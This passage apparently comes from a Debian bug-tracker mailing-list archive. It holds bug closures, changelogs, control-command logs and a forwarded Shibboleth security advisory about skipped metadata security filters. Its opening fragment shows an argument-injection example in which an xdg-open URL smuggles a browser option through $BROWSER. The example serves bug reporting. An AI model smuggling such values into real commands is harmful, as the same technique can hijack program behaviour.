xdg-open xdg-open's 'envvar' implementation (open_envvar) has this same problem when '%s' is present in $BROWSER: # Triggers incognito mode: BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito" # Does not trigger incognito mode: BROWSER="chromium" xdg-open "http://www.example.com/ --incognito" References == [1]
Bug#881658: marked as done (debhelper: breaks libguestfs)
Your message dated Wed, 15 Nov 2017 21:05:13 + with message-idand subject line Bug#881658: fixed in debhelper 10.10.8 has caused the Debian Bug report #881658, regarding debhelper: breaks libguestfs to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881658: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881658 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: debhelper Version: 10.10.7 Severity: serious Justification: breaks reverse-dependencies. Hello, I tried to rebuild libguestfs in ubuntu, and I found that commit [1] broke dh_install for packages using regex like: usr/include/guestfs.h usr/lib/*-*/libguestfs.a usr/lib/*-*/libguestfs.so usr/lib/*-*/libguestfs.la usr/lib/*-*/pkgconfig/* ending up in: dh_install -X.la -X.so.owner -Xbindtests -X/usr/lib/go/ -X/usr/lib/go- -Xpackages.orig -Xetc/php.d \ --fail-missing dh_install: Please use dh_missing --list-missing/--fail-missing instead dh_install: This feature will be removed in compat 12. dh_install: libguestfs-dev missing files: usr/lib/*-*/libguestfs.la dh_install: libguestfs-gobject-dev missing files: usr/lib/*-*/libguestfs-gobject-*.la dh_install: php-guestfs missing files: /etc/php.d dh_install: missing files, aborting I reverted that commit and uploaded in Ubuntu, I didn't check the debian package, but should be affected by the same bug (build ongoing here [2], will finish/fail hopefully in some minutes) [1] https://anonscm.debian.org/git/debhelper/debhelper.git/commit/dh_install?id=874410ef1389fe2a62c9361c75915c8541828b93 [2] http://debomatic-amd64.debian.net/distribution#unstable/libguestfs/1.36.10-1/buildlog signature.asc Description: OpenPGP digital signature --- End Message --- --- Begin Message --- Source: debhelper Source-Version: 10.10.8 We believe that the bug you reported is fixed in the latest version of debhelper, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 881...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Niels Thykier (supplier of updated debhelper package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Wed, 15 Nov 2017 19:46:00 + Source: debhelper Binary: debhelper dh-systemd Architecture: source Version: 10.10.8 Distribution: unstable Urgency: medium Maintainer: Debhelper Maintainers Changed-By: Niels Thykier Description: debhelper - helper programs for debian/rules dh-systemd - debhelper add-on to handle systemd unit files - transitional pack Closes: 881658 Changes: debhelper (10.10.8) unstable; urgency=medium . [ Niels Thykier ] * Document that compat 11 is now in its open beta phase. * Dh_Getopt: Improve warning message when a package is excluded due to profiles or architecture restrictions. * dh_install: Properly allow patterns to be excluded without complaining about missing files. (Closes: #881658) * qmake.pm: Ensure that the qmake cross-build config file survives until clean. . [ Dmitry Shachnev ] * qmake.pm: Set QMAKE_LINK correctly for cross-builds. Checksums-Sha1: 066ae8b686d56c1bc9be53326090f71102b2d618 1795 debhelper_10.10.8.dsc f33ccba194391a27b348277e2dbf1b9ff3b7960e 430984 debhelper_10.10.8.tar.xz 71bdeee16c6cd1f6a35227a37877696924f507d3 4510 debhelper_10.10.8_source.buildinfo Checksums-Sha256: ed5353a99244c5a7a42c11f2efd64452a2db23a6ed3dc87fcd2cc366165ce5b3 1795 debhelper_10.10.8.dsc a5437bd0629233aeb14133b387506b37c5dc4a3098cc22f8a5d519eca0fb76c1 430984 debhelper_10.10.8.tar.xz cd0fb0a8b7172cdc5fe330bfec55c489e9d5b98ae363de6aad768f5dc601e5ef 4510 debhelper_10.10.8_source.buildinfo Files: 0ff5d66d153a39f7986e0c1ea8a4ded9 1795 devel optional debhelper_10.10.8.dsc 9eba46098cb65cbad9dd4df92e636b3e 430984 devel optional debhelper_10.10.8.tar.xz f163fa4dca3566536981ea0fe2ee713f 4510 devel optional debhelper_10.10.8_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEsxMaRR2/33ygW0GXBUu7n32AZEIFAloMmecACgkQBUu7n32A ZEKdSw/8Dl8273BU9NUrpsmJD3D/Y+/T9i/LOGkFHKaH47/IioP7pfSDC7XdLA1B
Bug#851054: marked as done (alpine: Please migrate to openssl1.1 in buster)
Your message dated Wed, 15 Nov 2017 21:04:31 + with message-idand subject line Bug#851054: fixed in alpine 2.21+dfsg1-1 has caused the Debian Bug report #851054, regarding alpine: Please migrate to openssl1.1 in buster to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 851054: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851054 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: alpine Version: 2.20+dfsg1-2 Severity: important Control: block 827061 by -1 Hi, OpenSSL 1.1.0 is about to released. During a rebuild of all packages using OpenSSL this package fail to build. A log of that build can be found at: https://breakpoint.cc/openssl-1.1-rebuild-2016-05-29/Attempted/alpine_2.20+dfsg1-2_amd64-20160529-1403 On https://wiki.openssl.org/index.php/1.1_API_Changes you can see various of the reasons why it might fail. There are also updated man pages at https://www.openssl.org/docs/manmaster/ that should contain useful information. There is a libssl-dev package available in experimental that contains a recent snapshot, I suggest you try building against that to see if everything works. If you have problems making things work, feel free to contact us. Kurt --- End Message --- --- Begin Message --- Source: alpine Source-Version: 2.21+dfsg1-1 We believe that the bug you reported is fixed in the latest version of alpine, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 851...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Unit 193 (supplier of updated alpine package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 13 Nov 2017 17:09:24 -0500 Source: alpine Binary: alpine alpine-doc alpine-pico pilot Architecture: source Version: 2.21+dfsg1-1 Distribution: unstable Urgency: medium Maintainer: Asheesh Laroia Changed-By: Unit 193 Description: alpine - Text-based email client, friendly for novices but powerful alpine-doc - Text-based email client's documentation alpine-pico - Simple text editor from Alpine, a text-based email client pilot - Simple file browser from Alpine, a text-based email client Closes: 851054 862952 876164 Changes: alpine (2.21+dfsg1-1) unstable; urgency=medium . * New upstream version 2.21+dfsg1 (Closes: #862952) - Refresh patches. * Bump Standards-Version to 4.1.1. * Run wrap-and-sort -s. * d/control, d/watch: Update homepage to alpine.freeiz.com. * d/control, d/compat: Use debhelper compat 10. * d/control: - Switch to https in Vcs-*. - Mark alpine-doc as Multi-Arch foreign. - Drop requirement of libssl-dev to be 1.0. (Closes: #851054) - Drop explicit build-depend on auto(conf,make), dh-autoreconf and libtool. - Drop priority: extra from alpine-pico. * d/rules: - sha256sums no longer published, move to md5sums and update for 2.21. - Move from dh_install --list-missing to dh_missing --fail-missing. - Move installdocs override to installdocs-indep. - Only override dh_auto_configure with non-default options. - Don't verify files are there before moving, we should error out if not. - Drop obsolete --with autoreconf. * Merge d/p/30_fix_man_page_hardcoded_paths.patch and d/p/40_fix_filter_hardcoded_paths.patch into d/p/10_config2etc.patch. * Add descriptions to all patches. * d/control, d/p/95_cross.patch, d/rules: Fix FTCBFS. Thanks to Helmut Grohne for the initial patch. (Closes: #876164) * d/s/lintian-overrides: js file has long lines, but is sourceful. Checksums-Sha1: 19d4c50c9ae5ba5cf6a4f988512659901546ae42 2263 alpine_2.21+dfsg1-1.dsc 892b16ba8c1448f5d6749d4ad9e8e609f8079c0d 4231316 alpine_2.21+dfsg1.orig.tar.xz 6f6513ecd8d5391203ce0ddc46b1e109d2747b2c 17692 alpine_2.21+dfsg1-1.debian.tar.xz 7e8baeee78585b551a443dfad0b816f7ef18147d 8023 alpine_2.21+dfsg1-1_amd64.buildinfo Checksums-Sha256: ec2cde5fcf884cdd0607d1b9d58476b178e7e108263855b987adabbc0dbec9e3 2263 alpine_2.21+dfsg1-1.dsc
Bug#874708: anthy (EUCJP->UTF-8) and *-anthy packages
On Tue, Nov 07, 2017 at 11:44:45PM +0900, Osamu Aoki wrote: >... > Even these are updated with manual patches, all these updated package > needs to move together from unstable to testing. Not necessarily - the old library will can kept in testing until all reverse dependencies have migrated. > I am not very familiar > with this ABI breaking library update. We may need to add BREAKS: to > anthy to ensure this. (I am not sure) That may reqire to upload -7 for > anthy. > > Anyway, these need to be properly coordinated. >... It might be enough to just close this bug - this bug is currently the main blocker for the testing migration. > Osamu cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Processed: opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105)
Processing control commands: > clone -1 -2 Bug #881856 [src:opensaml2] opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105) Bug 881856 cloned as bug 881857 > reassign -2 shibboleth-sp2 2.5.3+dfsg-2 Bug #881857 [src:opensaml2] opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105) Bug reassigned from package 'src:opensaml2' to 'shibboleth-sp2'. No longer marked as found in versions opensaml2/2.5.3-2. Ignoring request to alter fixed versions of bug #881857 to the same values previously set Bug #881857 [shibboleth-sp2] opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105) There is no source info for the package 'shibboleth-sp2' at version '2.5.3+dfsg-2' with architecture '' Unable to make a source version for version '2.5.3+dfsg-2' Marked as found in versions 2.5.3+dfsg-2. > retitle -2 shibboleth-sp2: Dynamic MetadataProvider fails to install security > filters (SSCPP-763) Bug #881857 [shibboleth-sp2] opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105) Changed Bug title to 'shibboleth-sp2: Dynamic MetadataProvider fails to install security filters (SSCPP-763)' from 'opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105)'. -- 881856: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881856 881857: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881857 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881856: opensaml2: Dynamic MetadataProvider fails to install security filters (CPPOST-105)
Source: opensaml2 Version: 2.5.3-2 Severity: grave Tags: patch security upstream Justification: user security hole Control: clone -1 -2 Control: reassign -2 shibboleth-sp2 2.5.3+dfsg-2 Control: retitle -2 shibboleth-sp2: Dynamic MetadataProvider fails to install security filters (SSCPP-763) Hi As per https://shibboleth.net/community/advisories/secadv_20171115.txt an issue affecting opensaml2 and shibboleth-sp2: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Shibboleth Service Provider Security Advisory [15 November 2017] An updated version of the Shibboleth Service Provider software is available which corrects a critical security issue in the "Dynamic" metadata provider plugin. Deployers making use of the affected feature should apply the relevant update at the soonest possible moment. NOTE: CVEs for this issue are forthcoming from the Debian Project and this advisory will be updated if and when they are obtained. Dynamic MetadataProvider fails to install security filters The Shibboleth Service Provider software includes a MetadataProvider plugin with the plugin type "Dynamic" to obtain metadata on demand from a query server, in place of the more typical mode of downloading aggregates separately containing all of the metadata to load. All the plugin types rely on MetadataFilter plugins to perform critical security checks such as signature verification, enforcement of validity periods, and other checks specific to deployments. Due to a coding error, the "Dynamic" plugin fails to configure itself with the filters provided to it and thus omits whatever checks they are intended to perform, which will typically leave deployments vulnerable to active attacks involving the substitution of metadata if the network path to the query service is compromised. Affected Systems == All versions of the Service Provider software prior to V2.6.1 contain this vulnerability. There are no known mitigations to prevent this attack apart from applying this update. Deployers should take immediate steps, and may wish to disable the use of this feature until the upgrade is done. Service Provider Deployer Recommendations === Upgrade to V2.6.1 or later of the Service Provider and restart the shibd service/daemon. Sites relying on official RPM packages or Macports can update via the yum and port commands respectively. For those using platforms unsupported by the project team directly, refer to your vendor or package source directly for information on obtaining the fixed version. If the update from your vendor lags, you may consider building from source for your own use as an interim step. The patch commit that corrects this issue can be found at [1]. Additional Recommendations for Federation Operators = Operators of metadata query services in support of this feature may wish to consider implementing security checks after a suitable upgrade window has elapsed to prevent use of affected versions or follow up with deployers. The User Agent string in requests to the service will contain the version of the software. Note Regarding OpenSAML Library = An identical issue exists in the DynamicMetadataProvider class in the OpenSAML-C library in all versions prior to V2.6.1. Applications making direct use of this library must be independently updated to correct this vulnerability, but this fix does not correct the issue with respect to the use of the Shibboleth SP. The patch commit that corrects the OpenSAML issue can be found at [2]. Credits = Rod Widdowson, Steading System Software LLP [1] https://git.shibboleth.net/view/?p=cpp-sp.git;a=commit; h=b66cceb0e992c351ad5e2c665229ede82f261b16 [2] https://git.shibboleth.net/view/?p=cpp-opensaml.git;a=commit; h=6182b0acf2df670e75423c2ed7afe6950ef11c9d URL for this Security Advisory: https://shibboleth.net/community/advisories/secadv_20171115.txt -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEE3KoVAHvtneaQzZUjN4uEVAIneWIFAloMTwMACgkQN4uEVAIn eWKF4hAAqJxTRUQd/BxyQA4Cnq0ysA4A+Ld1+odGrBGQp4zKjmY4lK1SqbKKsPV3 7fJvFfmojZ5nWE/KtwHSoFyqAFqYLy/2MtwMUkF/lNQTQdgjVAJ0jTRSIvMZw0H+ PGfniwN+qSowwNQe6/nV9TbkSbFEfJSWcQ+VZkzchltwD4I2DQR7VTy4rlDfTj3L WTpz7+2927pawl0ELwYF4wdDf0JTA0b7hYy9Hbm0WZyOiN+nl//zTV2ZtzlwWt+k fNilA4BVl5OPmosp1FuPgsxCThRkHrr9SIwDeQDngSQqp8zomhDAuFLV6AZEuPXT hVoysaQDe12bbx6680uGSIvSs35qCiuqe8em+8Dek/Abiu0NDvPlpP01vMxYQc+U RN5emyWyFIbt4JDbYIaBz0sBYDcRNTMQrt/a5EQ1NCGx8mm5UIeDXacdd1MWb9hj f+KfO68JHMxZuONj5RysvByi6EyOuBuoGDsXoEzzGQQtmNa8e1wQurJYDnSAp+uA xayZKA2ea2FRpI0ON1UaZLARrn6o0Jf28FrbVO+h7e2wiX3la0oQKF5qBJ0sBYhP 5fXR/otDKeAz/3kZC/iSsDXY+ApLYurNk9AKMP4hfAfk5/xpBA7IisGk+w3RlJju d3iu9xFlcShS+pXbf1+P5qW1QFXZYnPU3gJlzTKcNbqcOPbLS/8= =IpAG -END PGP SIGNATURE- There is though the statement that CVEs will be assigned by the Debian project. This cannot be done, since the
Bug#880962: marked as done (mips*: "gcc --help=target --help=optimizers" busyloops forever)
a Valgrind-based detector of data races (runti libtsan0-dbg - ThreadSanitizer -- a Valgrind-based detector of data races (debug libubsan0 - UBSan -- undefined behaviour sanitizer (runtime) libubsan0-dbg - UBSan -- undefined behaviour sanitizer (debug symbols) libx32asan4 - AddressSanitizer -- a fast memory error detector (x32) libx32asan4-dbg - AddressSanitizer -- a fast memory error detector (x32 debug symbo libx32atomic1 - support library providing __atomic built-in functions (x32) libx32atomic1-dbg - support library providing __atomic built-in functions (x32 debug libx32cilkrts5 - Intel Cilk Plus language extensions (x32) libx32cilkrts5-dbg - Intel Cilk Plus language extensions (x32 debug symbols) libx32gcc-7-dev - GCC support library (x32 development files) libx32gcc1 - GCC support library (x32) libx32gcc1-dbg - GCC support library (debug symbols) libx32gfortran-7-dev - Runtime library for GNU Fortran applications (x32 development fil libx32gfortran4 - Runtime library for GNU Fortran applications (x32) libx32gfortran4-dbg - Runtime library for GNU Fortran applications (x32 debug symbols) libx32go11 - Runtime library for GNU Go applications (x32) libx32go11-dbg - Runtime library for GNU Go applications (x32 debug symbols) libx32gomp1 - GCC OpenMP (GOMP) support library (x32) libx32gomp1-dbg - GCC OpenMP (GOMP) support library (x32 debug symbols) libx32gphobos-7-dev - Phobos D standard library (x32 development files) libx32gphobos71 - Phobos D standard library (runtime library) libx32gphobos71-dbg - Phobos D standard library (debug symbols) libx32itm1 - GNU Transactional Memory Library (x32) libx32itm1-dbg - GNU Transactional Memory Library (x32 debug symbols) libx32lsan0 - LeakSanitizer -- a memory leak detector (x32) libx32lsan0-dbg - LeakSanitizer -- a memory leak detector (x32 debug symbols) libx32objc-7-dev - Runtime library for GNU Objective-C applications (x32 development libx32objc4 - Runtime library for GNU Objective-C applications (x32) libx32objc4-dbg - Runtime library for GNU Objective-C applications (x32 debug symbo libx32quadmath0 - GCC Quad-Precision Math Library (x32) libx32quadmath0-dbg - GCC Quad-Precision Math Library (x32 debug symbols) libx32stdc++-7-dev - GNU Standard C++ Library v3 (development files) libx32stdc++6 - GNU Standard C++ Library v3 (x32) libx32stdc++6-7-dbg - GNU Standard C++ Library v3 (debugging files) libx32ubsan0 - UBSan -- undefined behaviour sanitizer (x32) libx32ubsan0-dbg - UBSan -- undefined behaviour sanitizer (x32 debug symbols) Closes: 880962 881372 881729 881775 Changes: gcc-7 (7.2.0-15) unstable; urgency=medium . * Update to SVN 20171115 (r254781) from the gcc-7-branch. - Fix PR fortran/82934, PR fortran/78619, PR fortran/82869, PR tree-optimization/82985, PR tree-optimization/81790, PR debug/82155. * Fix libgo build on ia64 (Jason Duerstock). Closes: #881372. * Port libgo to the Hurd (Svante Signell). * Compress debug symbols for compiler binaries with dwz. * Fix PR other/82880, gcc --help=target hangs on mips (James Cowgill). Closes: #880962. * Add support for a plethora of mips r6 packages (YunQiang Su). Closes: #881729. * gcc-7-base: Add breaks to gnat (<< 7). Closes: #881775. Checksums-Sha1: 5fb1e457eca8a844a003fb84023760c5c85e3ed6 33199 gcc-7_7.2.0-15.dsc 31e9cb62041a8a0242b5a9bcea12bc58202652ff 3252463 gcc-7_7.2.0-15.diff.gz 377fe9450db9a7b3ba4836843e57c676913baf72 10300 gcc-7_7.2.0-15_source.buildinfo Checksums-Sha256: e40dc7bda573589d6972f785526227c232ec5da8192e16ec5e1ab69890e87c18 33199 gcc-7_7.2.0-15.dsc 9966fcc5fcaddbb9fc49afddfea5bb1018e3d119c7f0c7d4daf428960a5cccd8 3252463 gcc-7_7.2.0-15.diff.gz 2a57ce949e4807608d1055594fe7130218bb27602e573a46221c0c38fac03795 10300 gcc-7_7.2.0-15_source.buildinfo Files: fe5f8d58d9aeb870e8335f8593fc7c4f 33199 devel optional gcc-7_7.2.0-15.dsc f74a924184967235435c2e0bd1d416fb 3252463 devel optional gcc-7_7.2.0-15.diff.gz a9c4477b56817785bb2dcb36e88917ff 10300 devel optional gcc-7_7.2.0-15_source.buildinfo -BEGIN PGP SIGNATURE- iQJEBAEBCAAuFiEE1WVxuIqLuvFAv2PWvX6qYHePpvUFAloMki4QHGRva29AZGVi aWFuLm9yZwAKCRC9fqpgd4+m9UhMD/9C5jxOJ07kONZj5unslh9E2qxr6ePfnSxv ytj86kaEnGqCB1wYdItioUk3CmoAJBvjD7ZJWBCZmDyvQxwtO7tFB8s8etnXU6qA XmassFPthj2+bCyyYt0p+7WHHX55sZp8rt4wxHAMbd6RqOh91VoMiiGM/IAwE72J RUvxvpAjE6sd75nEhPwJXEJ61TbOO/Lr7zlQsUWSYfoRu/qe5PDyWR3fV2+OqpKI vW52LpQXiVPtviUYXQNWVYBlX2OCJ5LzXFkIR2gnjr+XoaP1JsYwN4yPwFfxy+8k pH+7qWjUaYkeEOPOlQLhlF8jmbN7B0KLnoE5Ih497jHi/Yukf0UrajyPeffqD0mV e8lQ1AmKYja/mBoojD0R50BbyDSlNG3fB1yyvHHE+cPrMAa17xvjTMWRWKnP0ln4 Nma8FDy0o3NkidKawDC/GN/LsZCvVWJH9uZcS2pTOET9DXHDI7zjhtZior3QDQv9 M1t0hybRHIwRXIxHAFM48BsK9PuQBQKbQPFCvsV55lQz9P76XQvY/7Aq+y4TBt0W WhUUdPPatyp0in22tisBenDFyYp43JMEVygiksFL10w2k0kquGyoOVQjIVFftYpz kypwBwy4Lv+4cq66h7JwNs2X5e9UGMODC6Y0oeVtyGe/OzDeqY4tb+ZGlNG6RBj+ hrkNSk4SMw== =TSGq -END PGP SIGNATURE End Message ---
Bug#881795: marked as done (fix ftbfs with updated libcdio)
Your message dated Wed, 15 Nov 2017 19:49:08 + with message-idand subject line Bug#881795: fixed in kover 1:6-1 has caused the Debian Bug report #881795, regarding fix ftbfs with updated libcdio to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:kover Version: 1:4-11 Severity: serious Tags: sid buster patch kover ftbfs with updated libcdio with the updated libcdio. Upstream version 6 builds fine with that. see https://launchpad.net/ubuntu/+source/kover for a packaging proposal. --- End Message --- --- Begin Message --- Source: kover Source-Version: 1:6-1 We believe that the bug you reported is fixed in the latest version of kover, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 881...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Pino Toscano (supplier of updated kover package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Wed, 15 Nov 2017 20:22:27 +0100 Source: kover Binary: kover Architecture: source Version: 1:6-1 Distribution: unstable Urgency: medium Maintainer: Pino Toscano Changed-By: Pino Toscano Description: kover - WYSIWYG CD cover printer Closes: 881795 Changes: kover (1:6-1) unstable; urgency=medium . * New upstream release: - uses cdio >= 0.90 (Closes: #881795) * Update the patches: - upstream_fix-compilation-errors-with-gcc-4.4.patch: drop, backported from upstream - upstream_make-kover.desktop-valid.patch: drop, backported from upstream - upstream_applied-patch-from-Adi-Roiban-adi-roiban.ro.patch: drop, backported from upstream - fix-PACKAGE-VERSION.diff: remove upstream changes, leave parts in comments (so it can be upstreamed) * Bump the libcdio-cdda-dev build dependency to >= 0.90, as required by upstream. * Bump Standards-Version to 4.1.1, no changes required. * Remove trailing spaces in changelog. Checksums-Sha1: 4fee4bc92f0e14267e8c7e9cd3a8898c613ca51a 1858 kover_6-1.dsc 3557d9d2cd38bae89c0287bb924a77c5f1d0bb96 87898 kover_6.orig.tar.bz2 e28bd85e40003745cea952e12d451bc8c0b4b466 7244 kover_6-1.debian.tar.xz d2e8b2756ce2980ce3dd6223b7aa4d57ba1bc41a 19781 kover_6-1_source.buildinfo Checksums-Sha256: 4380ca8625f1481429314a97df75471fbb9ab6783642c371ee4099327c20fb61 1858 kover_6-1.dsc 87494299d5dd7a51bbf3a1739f372da680744f14271c43d8495eca15f1f2480a 87898 kover_6.orig.tar.bz2 9452d57fd8e59ee4627802733dda5328437363aab736512eabb80edbba1519c4 7244 kover_6-1.debian.tar.xz cf60921f8977e5af09cb2a3fe667510d1c0c1a8712c07ac75bd9f7ebf6492119 19781 kover_6-1_source.buildinfo Files: 67d79ef8b0e12c0e8245783323f5b227 1858 graphics optional kover_6-1.dsc 9504afd8a779c54d7c77fb28d7b5c76e 87898 graphics optional kover_6.orig.tar.bz2 c327d4b730b6a3adfb112538972cf39b 7244 graphics optional kover_6-1.debian.tar.xz 882a75959ad9d7044593c550f6028f3f 19781 graphics optional kover_6-1_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEXyqfuC+mweEHcAcHLRkciEOxP00FAloMlMYACgkQLRkciEOx P03xKA/+Liyyg/K6zkieQHIAmfvosd2y2biB8uqkcElTYO9/grLD8XAOm9+NwBLG ny6EoUWhCHWeVBfFx7e7b8j/F59zVD3ZbXnrDqcqDAExQv+BhmThsbImAViXFUDC XgFJLrBF3PAEWbs55kj8XwUZEqFTj7RVEi7vxU5VMMoLO6nim6XtFoZzVDIGPd4/ oS1ibVHDe/6NOXcPg5qmleTwUQaqbr8Vr83oisXEygyk1kcdY+tduThXFc371n/B Xv0Rk4sGHEQM9nXH+ghmUbADmcKl4HJSnHUXd2LtGtBVOxTeO/9txI5nCwRDc0aR JwuKlC72Jozfk3haVuQsRkRL9V8f7uyauWSJASqh5jG4A8/mpyIneKyFYtFpV9yW JGrjiZ8nFmf6XVPCZRtjCtWvAz1dYetG4kRZH88Y3tN+NZfz7xHjoHtlZoBu/6WS fWk1wgrDWM5BrLQTKvWnZK8pBT0wF/YFAL5ED06te6tSUKruzlR2sZJTtTDnLTmb DVf9B7+qPskcZHYwfdGBKFrhuG+IYnZQ2HHbwcohoC3Faphg1gWlAzx8yFPjqTxW Zetr5swMiq5OFSAsTwoQSt7ye++Bg+j5s2Ftgjv+nq2fVpnlJ+lier1M5V2B9ifL Ywm88FVs/0rJU+Nu2dvoUr6W6OpbV+7EDZJnd6peVfczAMseV9U= =VvVu -END PGP SIGNATURE End Message ---
Bug#881793: marked as done (fix ftbfs with updated libcdio-paranoia)
Your message dated Wed, 15 Nov 2017 20:29:17 +0100 with message-idand subject line Re: Bug#881793: fix ftbfs with updated libcdio-paranoia has caused the Debian Bug report #881793, regarding fix ftbfs with updated libcdio-paranoia to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881793: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881793 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:daisy-player Version: 11.2-1 Severity: serious Tags: sid buster patch patch at https://patches.ubuntu.com/d/daisy-player/daisy-player_11.2-1ubuntu1.patch --- End Message --- --- Begin Message --- Version: 11.2-2 daisy-player (11.2-2) unstable; urgency=medium [ Matthias Klose ] * Fix build with libcdio 0.94. [ Paul Gevers ] * Upload in Debian -- Paul Gevers Wed, 15 Nov 2017 19:30:57 +0100 signature.asc Description: OpenPGP digital signature --- End Message ---
Processed: Not a problem in stretch
Processing commands for cont...@bugs.debian.org: > tags 881023 buster sid Bug #881023 {Done: Andreas Tille} [src:librcsb-core-wrapper] librcsb-core-wrapper: FTBFS with xerces-c3.2 Added tag(s) sid and buster. > thanks Stopping processing here. Please contact me if you need assistance. -- 881023: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881023 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: tagging 876892, tagging 850898, tagging 828522, tagging 881358
Processing commands for cont...@bugs.debian.org: > tags 876892 + experimental Bug #876892 [src:dh-kpatches] dh-kpatches FTBFS with gtk-doc-tools 1.26: docbook-2-html: unknown style `gtk' Added tag(s) experimental. > tags 850898 - stretch Bug #850898 [src:sipxtapi] sipxtapi: Please migrate to openssl1.1 in buster Removed tag(s) stretch. > tags 828522 + experimental - stretch Bug #828522 {Done: Lisandro Damián Nicanor Pérez Meyer} [src:qt4-x11] qt4-x11: FTBFS with openssl 1.1.0 Added tag(s) experimental. Bug #828522 {Done: Lisandro Damián Nicanor Pérez Meyer } [src:qt4-x11] qt4-x11: FTBFS with openssl 1.1.0 Removed tag(s) stretch. > tags 881358 + sid buster Bug #881358 {Done: Sebastian Ramacher } [vdpau-va-driver] nvidia_drv_video.so has no function __vaDriverInit_1_0 Added tag(s) sid and buster. > thanks Stopping processing here. Please contact me if you need assistance. -- 828522: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=828522 850898: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850898 876892: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876892 881358: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881358 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: tagging 881795
Processing commands for cont...@bugs.debian.org: > tags 881795 + pending Bug #881795 [src:kover] fix ftbfs with updated libcdio Added tag(s) pending. > thanks Stopping processing here. Please contact me if you need assistance. -- 881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#859546: owl: FTBFS with openssl 1.1.0
Control: block -1 by 881693 owl has been requested to be RM'ed in #881693
Processed: Re: owl: FTBFS with openssl 1.1.0
Processing control commands: > block -1 by 881693 Bug #859546 [src:owl] owl: Please migrate to openssl1.1 in buster 859546 was not blocked by any bugs. 859546 was blocking: 871056 Added blocking bug(s) of 859546: 881693 -- 859546: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859546 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: tagging 881795
Processing commands for cont...@bugs.debian.org: > tags 881795 - patch Bug #881795 [src:kover] fix ftbfs with updated libcdio Removed tag(s) patch. > thanks Stopping processing here. Please contact me if you need assistance. -- 881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#880674: marked as done (libpango-1.0-0: Thai word break stops working since 1.40.13)
